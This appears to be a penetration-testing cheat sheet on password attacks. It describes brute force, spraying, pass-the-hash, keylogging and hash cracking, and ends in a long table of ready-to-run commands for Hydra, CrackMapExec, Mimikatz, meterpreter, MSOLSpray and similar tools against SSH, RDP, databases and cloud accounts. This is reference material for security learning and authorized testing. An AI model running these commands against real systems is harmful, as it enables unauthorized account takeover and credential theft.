Password Attacks
1. Introduction to Password Attacks
Password attacks aim to uncover valid credentials by exploiting weaknesses in password management, storage, or selection. Effective password attacks often rely on weak passwords, poor encryption practices, or unpatched systems.
2. Common Types of Password Attacks
a. Brute Force Attack
Description: Attempts every possible combination of characters to guess the password.
Tools: Hydra, John the Ripper, Hashcat.
Pros & Cons: Effective for shorter passwords but time-consuming for complex ones.
Command Example:
hydra -l user -P /path/to/wordlist.txt <target_IP> ssh
b. Dictionary Attack
Description: Uses a predefined list of likely passwords to attempt matches.
Tools: Hashcat, Medusa, John the Ripper.
Pros & Cons: Faster than brute force but limited by the quality of the dictionary.
Resources for Wordlists:
c. Hybrid Attack
Description: Combines dictionary words with character variations, like appending numbers or symbols.
Tools: Hashcat with hybrid mode, John the Ripper.
Pros & Cons: Targets passwords that follow predictable patterns effectively.
Command Example:
hashcat -a 6 -m <hash_type> <hash_file> /path/to/wordlist.txt
d. Rainbow Table Attack
Description: Uses precomputed tables of hashed passwords to quickly find matches.
Tools: Rainbow Crack, Ophcrack.
Pros & Cons: Very fast if the table matches the hashing algorithm but requires significant storage.
Rainbow Table Resources:
e. Credential Stuffing
Description: Reuses breached username-password pairs across multiple accounts.
Tools: Sentry MBA, Snipr, OpenBullet.
Pros & Cons: Effective against users who reuse passwords but limited by the availability of breached data.
Resources for Credential Dumps:
f. Password Spraying
Description: Attempts a few common passwords across many accounts to avoid account lockouts.
Tools: CrackMapExec, Ruler, Spraying Toolkit.
Pros & Cons: Effective against organizations with weak password policies but can be detected by activity monitoring.
3. Popular Password Hacking Tools
a. John the Ripper
Description: One of the most popular open-source password cracking tools.
Capabilities: Supports many hashing algorithms, custom rules, and has a wide range of cracking modes.
Resources: John the Ripper Documentation
b. Hashcat
Description: A high-performance password cracker optimized for GPU processing.
Capabilities: Supports multiple attack modes and advanced rules.
Resources: Hashcat Wiki
c. Hydra
Description: A fast network login cracker for numerous protocols (SSH, FTP, HTTP, etc.).
Capabilities: Brute-forcing and dictionary attacks across various protocols.
Resources: Hydra GitHub Repository
d. Medusa
Description: A versatile brute-forcing tool that supports many protocols.
Capabilities: Known for its speed and flexibility.
Resources: Medusa Documentation
e. CrackMapExec
Description: A Swiss Army knife for pentesters that supports spraying, brute-forcing, and exploitation.
Capabilities: Integrated with Metasploit for extensive password attacks on Windows.
Resources: CrackMapExec GitHub
f. Ophcrack
Description: Uses rainbow tables for cracking Windows LM and NTLM hashes.
Capabilities: Specialized in Windows passwords.
Resources: Ophcrack Official Site
4. Specialized Password Attack Techniques
a. Man-in-the-Middle (MitM) Attacks
Description: Intercepts passwords as they travel over the network.
Tools: Ettercap, MITMf, Bettercap.
Resources: Bettercap Documentation
b. Pass-the-Hash
Description: Uses hashed passwords to authenticate without cracking them.
Tools: Mimikatz, Pass-the-Hash Toolkit.
Resources: Mimikatz GitHub
c. Keylogging and Malware
Description: Captures keystrokes to retrieve passwords directly from user input.
Tools: Metasploit (keylogger payloads), Cobalt Strike.
Pros & Cons: Effective, but requires malware delivery and installation.
d. Phishing and Social Engineering
Description: Tricking users into revealing their passwords via fake login pages or deceptive requests.
Tools: Gophish, SET (Social Engineering Toolkit).
Resources: Gophish GitHub
5. Hash Cracking Techniques and Tools
a. NTLM and LM Hash Cracking
Tools: Cain and Abel, Ophcrack.
Command Example:
john --format=NT hashfile
b. SHA-1 and SHA-256 Cracking
Tools: Hashcat, John the Ripper.
Command Example:
hashcat -m 100 hashfile /path/to/wordlist.txt
c. PBKDF2 and bcrypt Cracking
Tools: Hashcat, JtR.
Resources: Hashcat Hash Modes
6. Guides and Resources for Further Learning
General Password Attack Guide: OWASP Password Attack Cheat Sheet
Understanding Hash Functions: NIST Guide to Cryptographic Hashes
Advanced Cracking Techniques: Hashcat Advanced Cracking Techniques
Conclusion
This extensive look at password attacks illustrates the variety of tools and techniques available to an attacker and how each method can be mitigated with strong security practices. In practice, penetration testers should select methods based on target context, password strength, and network defenses. As password attacks continue to evolve, regularly reviewing and updating this knowledge with new tools and methods will ensure a strong foundation in penetration testing and cybersecurity.
Below is a comprehensive table of common password attack vectors, primary tools used for each, and example usages. This will provide an extensive reference list for various attack techniques, covering both standard and specialized tools.
Attack Vector
Primary Tool
Example Usage
Brute Force
Hydra
hydra -l user -P /path/to/wordlist.txt <target_IP> ssh
Dictionary Attack
John the Ripper
john --wordlist=/path/to/wordlist.txt hashfile
Hybrid Attack
Hashcat
hashcat -a 6 -m 1000 hashfile /path/to/wordlist.txt
Rainbow Table Attack
Ophcrack
ophcrack -t rainbow-table-file hashfile
Credential Stuffing
Snipr
Uses breach lists for multi-account testing
Password Spraying
CrackMapExec
crackmapexec smb <target_IP> -u users.txt -p common-passwords.txt
Keylogging Attack
Metasploit
meterpreter > keyscan_start
Phishing
Gophish
Set up phishing campaign targeting email credentials
Pass-the-Hash
Mimikatz
sekurlsa::pth /user:Admin /domain:domain /ntlm:<NTLM_HASH> /run:powershell.exe
Hash Cracking (NTLM)
Hashcat
hashcat -m 1000 hashfile /path/to/wordlist.txt
Hash Cracking (bcrypt)
John the Ripper
john --format=bcrypt hashfile
LM Hash Cracking
Cain and Abel
Load hashes and run automated cracking
SSH Brute Force
Hydra
hydra -l root -P passwords.txt ssh://<target_IP>
HTTP Basic Auth Brute Force
Medusa
medusa -h <target_IP> -U users.txt -P passwords.txt -M http
FTP Brute Force
Hydra
hydra -l anonymous -P passwords.txt ftp://<target_IP>
SMB Password Attack
CrackMapExec
crackmapexec smb <target_IP> -u admin -p passwords.txt
SQL Database Password Cracking
SQLMap
sqlmap -u <URL> --crack --passwords
WPA2 Wi-Fi Cracking
aircrack-ng
aircrack-ng -w /path/to/wordlist.txt <capture-file>
Email Phishing with Spoofed Links
SET (Social-Engineer Toolkit)
Phishing module setup targeting email collection
Reverse Brute Force
Hydra
hydra -L usernames.txt -p commonpassword <target_IP> ssh
Multi-Protocol Password Testing
Medusa
Supports SMB, HTTP, FTP, Telnet, etc.
Telnet Brute Force
Hydra
hydra -l root -P passwords.txt telnet://<target_IP>
RDP Brute Force
Hydra
hydra -l Administrator -P passwords.txt rdp://<target_IP>
Cisco Router Cracking
Ncrack
ncrack -p 23 --user root --pass passwords.txt <target_IP>
DNS Zone Transfer Attempt
nslookup
nslookup -type=any -query=AXFR <target_domain>
LDAP Password Attack
Medusa
medusa -h <target_IP> -u user -P passwords.txt -M ldap
Telnet Credential Guessing
Hydra
hydra -l admin -P passwords.txt telnet://<target_IP>
SNMP Community String Brute Force
Onesixtyone
onesixtyone -c community-strings.txt <target_IP>
OpenVPN Brute Force
Hydra
hydra -l user -P passwords.txt openvpn://<target_IP>
Apache Tomcat Manager Brute Force
Hydra
hydra -l admin -P passwords.txt http-get://<target_IP>:8080/manager/html
XMPP Brute Force
Hydra
hydra -l user -P passwords.txt xmpp://<target_IP>
SIP/VoIP Credential Guessing
Svmap
Scans for SIP servers and attempts weak password logins
Oracle DB Password Attack
ODAT
odat passwordguesser -s <target_IP> -U usernames.txt -P passwords.txt
MSSQL Password Cracking
Hydra
hydra -l sa -P passwords.txt mssql://<target_IP>
Kerberos TGT Brute Forcing
Kerbrute
kerbrute bruteuser -d domain.com users.txt
RADIUS Brute Force
Medusa
medusa -h <target_IP> -u user -P passwords.txt -M radius
MongoDB Password Attack
Hydra
hydra -l user -P passwords.txt mongodb://<target_IP>
Redis Unauthorized Access Check
Nmap
nmap -p 6379 --script redis-brute <target_IP>
MacOS Keychain Exploit
Metasploit
Post-exploitation module in meterpreter for keychain access
VNC Password Brute Force
Hydra
hydra -P passwords.txt vnc://<target_IP>
VoIP/SIP Password Cracking
Hydra
hydra -L users.txt -P passwords.txt sip://<target_IP>
Bitcoin Wallet Brute Force
btcrecover
Uses known wallet details to attempt password recovery
Azure AD Password Spraying
MSOLSpray
python3 MSOLSpray.py -u users.txt -p Password123
Office365 Credential Testing
AADInternals
Uses PowerShell to enumerate and test credentials
ZIP File Password Cracking
fcrackzip
fcrackzip -u -D -p /path/to/wordlist.txt <file.zip>
PDF Password Cracking
pdfcrack
pdfcrack -f <file.pdf> -w /path/to/wordlist.txt
RAR File Password Cracking
RarCrack
rarcrack <file.rar> --type rar --dictionary /path/to/wordlist.txt
Network Share Password Cracking
CrackMapExec
crackmapexec smb <target_IP> -u usernames.txt -p passwords.txt
This table should give a thorough understanding of various password attack vectors, tools, and sample commands to use. For each method, there are nuances to configurations and optimizations, so consulting tool-specific documentation and adjusting commands to your target environment can maximize effectiveness.
Last updated